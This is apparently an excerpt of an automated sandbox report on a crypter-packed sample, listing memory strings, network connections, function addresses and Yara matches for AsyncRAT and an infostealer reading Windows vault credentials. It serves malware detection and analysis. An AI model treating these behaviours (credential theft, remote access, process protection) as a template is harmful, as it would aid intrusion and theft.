                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=vi
                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=zh_cn
                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=zh_hk
                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=zh_tw
                  Source: msedgewebview2.exe, 0000001D.00000002.3710696575.00002DDC010C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/B
                  Source: msedgewebview2.exe, 0000001D.00000002.3710696575.00002DDC010C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/W
                  Source: msedgewebview2.exe, 0000001D.00000002.3662559545.0000021F32833000.00000002.00000001.00040000.00000032.sdmpString found in binary or memory: https://www.whatsapp.com/WhatsApp
                  Source: msedgewebview2.exe, 00000020.00000003.2464009817.00001B4400468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/accept-encodinggzip
                  Source: msedgewebview2.exe, 00000020.00000002.3658956575.00001B44003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/ajax/bz?__a=1&__ccg=UNKNOWN&__dyn=7xe6E5aQ1PyUbFp41twpUnwgU29zEdEc8uwdK0lW4
                  Source: msedgewebview2.exe, 0000001D.00000002.3705771908.00002DDC00D14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/ar
                  Source: msedgewebview2.exe, 0000001D.00000002.3704505743.00002DDC00B64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/atorOnPMSequence
                  Source: msedgewebview2.exe, 00000026.00000003.2529580323.00004B180119C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/coupon?code=
                  Source: msedgewebview2.exe, 0000001D.00000002.3704048932.00002DDC00B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/dows/newsbar
                  Source: msedgewebview2.exe, 0000001D.00000002.3709952250.00002DDC0103C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/enerPolicyime
                  Source: msedgewebview2.exe, 0000001D.00000002.3710696575.00002DDC010C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/i
                  Source: msedgewebview2.exe, 00000020.00000003.2568867078.00001B44003B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/n
                  Source: msedgewebview2.exe, 0000001D.00000002.3705679870.00002DDC00CEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/nOpenerPolicy
                  Source: msedgewebview2.exe, 00000026.00000003.2529580323.00004B180119C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/otp/code
                  Source: msedgewebview2.exe, 00000026.00000003.2529580323.00004B180119C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/otp/copy/
                  Source: msedgewebview2.exe, 00000026.00000003.2530934203.00004B18011C4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2530618133.00004B18011B4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2530517789.00004B18011B0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2529580323.00004B180119C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/policies/commerce-policy
                  Source: msedgewebview2.exe, 0000001D.00000002.3704505743.00002DDC00B64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/rom
                  Source: msedgewebview2.exe, 0000001D.00000002.3709467420.00002DDC00FD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/unner.hoperator()
                  Source: msedgewebview2.exe, 0000001D.00000002.3711309571.00002DDC01178000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/uration.RegularFrame
                  Source: msedgewebview2.exe, 00000020.00000002.3659915456.00001B440040C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/whatsapp_browser_
                  Source: msedgewebview2.exe, 0000001D.00000002.3696682799.00002DDC0068C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2566414130.00002DDC011D8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2379485108.00002DDC011B0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2367320467.00002DDC00C70000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2365404102.00002DDC01148000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2367024620.00002DDC01138000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2362928346.00002DDC00C7C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2362700408.00002DDC01104000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3708663514.00002DDC00F3C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2567021699.00002DDC0150C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2365366959.00002DDC006B4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2366973993.00002DDC01128000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2379410298.00002DDC011C8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2397720050.00002DDC011D8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2420175454.00002DDC00B55000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2566304427.00002DDC01548000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2570283052.00002DDC01234000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2564490059.00002DDC01138000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000002.3643498240.00001B44000A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2389306555.00001B4400438000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2549634681.00001B440043C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/whatsapp_browser_error_reports/
                  Source: msedgewebview2.exe, 0000001D.00000003.2564433283.00002DDC01128000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2566414130.00002DDC011D8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2379485108.00002DDC011B0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2367320467.00002DDC00C70000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2365404102.00002DDC01148000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2367024620.00002DDC01138000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2362928346.00002DDC00C7C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2362700408.00002DDC01104000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3709381754.00002DDC00FB0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2567021699.00002DDC0150C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2365366959.00002DDC006B4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2366973993.00002DDC01128000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2379410298.00002DDC011C8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2397720050.00002DDC011D8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2420175454.00002DDC00B55000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2566304427.00002DDC01548000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2570283052.00002DDC01234000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2564490059.00002DDC01138000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2389306555.00001B4400438000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2549634681.00001B440043C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2573925253.00001B440044D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown
                  Source: msedgewebview2.exe, 0000001D.00000002.3709381754.00002DDC00FB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknownm
                  Source: msedgewebview2.exe, 00000020.00000002.3643336432.00001B4400088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/whatsapp_browser_error_reports/css
                  Source: msedgewebview2.exe, 00000020.00000002.3655936389.00001B4400284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/whatsapp_browser_error_reports/er
                  Source: msedgewebview2.exe, 00000020.00000002.3659915456.00001B440040C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/whatsapp_browser_rror_reports/
                  Source: msedgewebview2.exe, 0000001D.00000002.3710350081.00002DDC01094000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/wsbar
                  Source: msedgewebview2.exe, 0000001D.00000002.3710696575.00002DDC010C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com:443
                  Source: msedgewebview2.exe, 0000001D.00000002.3704600886.00002DDC00BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.comAAA0CEDDC5F8DF7DB7FCB9C5C60)
                  Source: msedgewebview2.exe, 00000020.00000002.3660602441.00001B4400424000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                  Source: BotMaster.exe, 0000001A.00000000.2266898531.0000000000DA2000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: https://www.youtube.com/channel/UCYVg9u9eLx2gQ80OlwoJKYwAhttps://twitter.com/khaldoun_bazOhttps://ww
                  Source: msedgewebview2.exe, 00000026.00000003.2426739799.00004B1800AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/
                  Source: msedgewebview2.exe, 00000020.00000002.3647474243.00001B4400130000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/;block-all-mixed-content;upgrade-insecure-requests;
                  Source: msedgewebview2.exe, 00000026.00000003.2426739799.00004B1800AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com;style-src
                  Source: msedgewebview2.exe, 0000001D.00000002.3710111145.00002DDC01064000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.comU
                  Source: msedgewebview2.exe, 00000026.00000003.2426739799.00004B1800AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.comc
                  Source: msedgewebview2.exe, 0000001D.00000002.3699087294.00002DDC007D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.comw
                  Source: msedgewebview2.exe, 0000001D.00000002.3667347760.0000021F32ADB000.00000004.00000020.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3666579423.0000021F32A8E000.00000004.00000020.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3664587613.0000021F32A52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com
                  Source: msedgewebview2.exe, 0000001D.00000002.3664587613.0000021F32A52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com/
                  Source: msedgewebview2.exe, 0000001D.00000002.3664587613.0000021F32A2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com3
                  Source: msedgewebview2.exe, 0000001D.00000002.3664587613.0000021F32A2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xsts.auth.xboxlive.comm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yxtg.3zwx.cn/tg/ttfc.html?sc=
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yxtg.flamebird.cn/tg/ttfc.html?sc=
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yxtg.taojike.com.cn/tg/ttfc.html?sc=
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://zum.com/?af=
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeCode function: 8_2_00425769 GetFocus,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetClassNameW,wcsncmp,SendMessageW,GetKeyState,GetKeyState,GetKeyState,GetPropW,GetPropW,GetPropW,GetWindowThreadProcessId,GetCurrentProcessId,8_2_00425769

                  Operating System Destruction

                  barindex
                  Protects its processes via BreakOnTermination flag
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: 01 00 00 00 Jump to behavior

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 9.2.aspnet_compiler.exe.7760000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 9.2.aspnet_compiler.exe.7760000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 00000009.00000002.3711384740.0000000007760000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 00000009.00000002.3640012189.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 0000002B.00000002.2519566978.0000000003041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeCode function: 8_2_00404CE9 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,8_2_00404CE9
                  Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeCode function: 0_2_00DED3180_2_00DED318
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeCode function: 0_2_00DEB4790_2_00DEB479
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeCode function: 0_2_00DEC5080_2_00DEC508
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeCode function: 0_2_00DEC8FE0_2_00DEC8FE
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeCode function: 0_2_00DE81500_2_00DE8150
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeCode function: 0_2_00DED3D90_2_00DED3D9
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeCode function: 0_2_00DE2BB70_2_00DE2BB7
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeCode function: 0_2_00DEB4790_2_00DEB479
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeCode function: 0_2_00DECCD30_2_00DECCD3
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeCode function: 0_2_00DEC4F80_2_00DEC4F8
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeCode function: 0_2_00DECDCE0_2_00DECDCE
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeCode function: 0_2_00DEC5420_2_00DEC542
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeCode function: 0_2_00DED7C00_2_00DED7C0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeCode function: 0_2_013C71C00_2_013C71C0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeCode function: 0_2_013CAC680_2_013CAC68
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeCode function: 0_2_013C74F70_2_013C74F7
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeCode function: 0_2_013C87D80_2_013C87D8
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeCode function: 0_2_051373580_2_05137358
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeCode function: 0_2_0513B7F00_2_0513B7F0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeCode function: 0_2_0513B7E30_2_0513B7E3
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeCode function: 8_2_004150308_2_00415030
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeCode function: 8_2_004171A08_2_004171A0
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeCode function: 8_2_004136F08_2_004136F0
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeCode function: 8_2_00410B308_2_00410B30
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeCode function: 8_2_00414D908_2_00414D90
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeCode function: 8_2_00413FFB8_2_00413FFB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_029662DD9_2_029662DD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_029653889_2_02965388
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_0296631E9_2_0296631E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_0296C3679_2_0296C367
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_029663609_2_02966360
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_029664209_2_02966420
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_0296A5189_2_0296A518
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_02969F209_2_02969F20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_02965D309_2_02965D30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_02965D5A9_2_02965D5A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_029662C89_2_029662C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_029622F09_2_029622F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_029662129_2_02966212
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_0296238A9_2_0296238A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_029663B49_2_029663B4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_029623BC9_2_029623BC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_029623A49_2_029623A4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_029623D99_2_029623D9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_029623F69_2_029623F6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_029622F09_2_029622F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_0296232A9_2_0296232A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_0296235D9_2_0296235D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_029623469_2_02962346
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_029623709_2_02962370
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_029653799_2_02965379
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_029671C09_2_029671C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_0296C67B9_2_0296C67B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_0296274A9_2_0296274A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_0296C4179_2_0296C417
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_0296C5C49_2_0296C5C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_0296C5229_2_0296C522
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_02962ADC9_2_02962ADC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_02961A3C9_2_02961A3C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_02961A409_2_02961A40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_02965E959_2_02965E95
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_02965F769_2_02965F76
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_02961D909_2_02961D90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_02961DA09_2_02961DA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_05C835589_2_05C83558
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_05C82D609_2_05C82D60
